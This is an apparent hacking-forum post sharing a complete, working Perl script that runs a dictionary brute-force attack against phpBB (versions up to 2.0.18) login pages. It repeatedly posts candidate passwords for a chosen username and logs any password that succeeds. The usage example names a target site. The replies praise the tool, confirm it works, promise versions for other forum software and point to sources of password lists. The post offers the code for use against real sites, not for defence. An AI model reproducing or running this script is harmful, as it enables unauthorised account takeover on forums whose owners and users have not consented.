phpBB <=2.0.18 "Login Dictionnary Attack"

phpBB <=2.0.18 "Login Dictionnary Attack"
--> Brute force login.php with dictionnary

This exploit is Coded by my friend DarkFig.. enjOY antichat

Usage: brutephpbb.pl <host> <path> <port> <pass_file> <username> <logfile>

C:\:brutephpbb.pl www.target.ru /phpBB2/ 80 dictionnary.txt admin result.txt

Code:

#!/usr/bin/perl 
############################################ 
#--------------------------Hack Private Version property------------------------- 
#Credits:                        Weakness and Xploit by DarkFig 
#Affected products:     All PhpBB versions <= 2.0.18 
#Type:                            Dictionnary attack 
#Solutions:                    None official , but many solutions are possible ;) 
#Note:                           Not yet revealed | If a line of the dictionnary file contain no data => "End of the password file" 
#For:                             Hack Private Version       
#------------------------------------------------------------------------------------------------ 
############################################ 
use IO::Socket; 

#--------------Utilisation--------------# 
if(@ARGV != 6){ 
print " 
+---------------------------------------------------------------------------------+ 
+--------------------PhpBB <= 2.0.18 Passwd Dictionnary Attack--------------------+ 
+-----------------------By DarkFig for Hack Private Version-----------------------+ 
+---------------------------------------------------------------------------------+ 
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile>    + 
+---------------------------------------------------------------------------------+ 
+ <host>        => The host where PhpBB is installed        |   [Ex: site.com]    + 
+ <path>        => Path of the PhpBB board                  |   [Ex: /forum/]     + 
+ <port>        => PhpBB board port                         |   [Default is 80]   + 
+ <pass_file>   => File containing words (dictionnary file) |   [Ex: dico.txt]    + 
+ <username>    => Username you want to bruteforce          |   [Ex: MasterLamer] + 
+ <file_result> => File you want to log activity            |   [Ex: results.txt] + 
+---------------------------------------------------------------------------------+ 
";exit();} 

#--------------Data--------------# 
$host       = $ARGV[0]; 
$path       = $ARGV[1]; 
$full       = "$host"."$path"; 
$port       = $ARGV[2]; 
$pass_file  = $ARGV[3]; 
$username   = $ARGV[4]; 
$fileresult = $ARGV[5]; 
$OK         = 0; 
$referer    = "http://"."$host"."$path"."login.php?redirect="; 
$postit     = "$path"."login.php"; 

#--------------Hello world-----------------# 
print " 
+---------------------------------------------------------+ 
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + 
+---------------------------------------------------------+ 
       [+] Username             | $username 
       [+] Dictionnary file     | $pass_file 
       [+] Attack log           | $fileresult 
+---------------------------------------------------------+"; 

#--------------Password file--------------# 
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n"); 
chomp(@passdico = <FILE>); 
$nligne = "0"; 
while ($OK ne 1) { 
$passwordz  = "$passdico[$nligne]"; 
$request    = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion"; 
$length     = length $request; 
if ($passwordz eq ""){print "\n[-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();} 

#--------------Sending data--------------# 
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed..."; 
print $send "POST $postit HTTP/1.1\n"; 
print $send "Host: $host\n"; 
print $send "Content-Type: application/x-www-form-urlencoded\n"; 
print $send "Content-Length: $length\n\n"; 
print $send "$request\n"; 
read $send, $answer, 15; 
close($send); 

#-------------Success--------------------------------------------# 
if ($answer =~ /HTTP\/(.*?) 302/) { 
$OK = 1; 
print " 
       [-] Trying the password "."$passwordz 
       [+] User:     $username 
       [+] Password: $passwordz 
+---------------------------------------------------------+\n"; 
open results, ">$fileresult"; 
print results " 
+---------------------------------------------------------+ 
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + 
+---------------------------------------------------------+ 
    [+] PhpBB board               | $full 
   [+] Board's port              | $port 
   [+] Username                  | $username 
   [+] Dictionnary file          | $pass_file 
    [+] Number of test            | $nligne 
    [+] Password found            | $passwordz 
+---------------------------------------------------------+\n"; 
close(FILE);close(results);exit();} 

#-------------Failed--------------------------------------------# 
if ($OK == 0) {print "\n       [-] Trying the password "."$passwordz";$nligne++;}}

Made in France !

 

Vidйo : here

 

big tnx
nice

 

well done man, good job!

 

good... France is friend

 

ipb, punbb versions coming soon

Powaaaaaaaa my friends !

 

The speed is not very high, but IT WORKS=) 10x
+!

 

Good job Nemesis , thanks

 

Excuse me,where can I get a Dictionnary?

 

www.yandex.ru
www.google.com
antichat=>search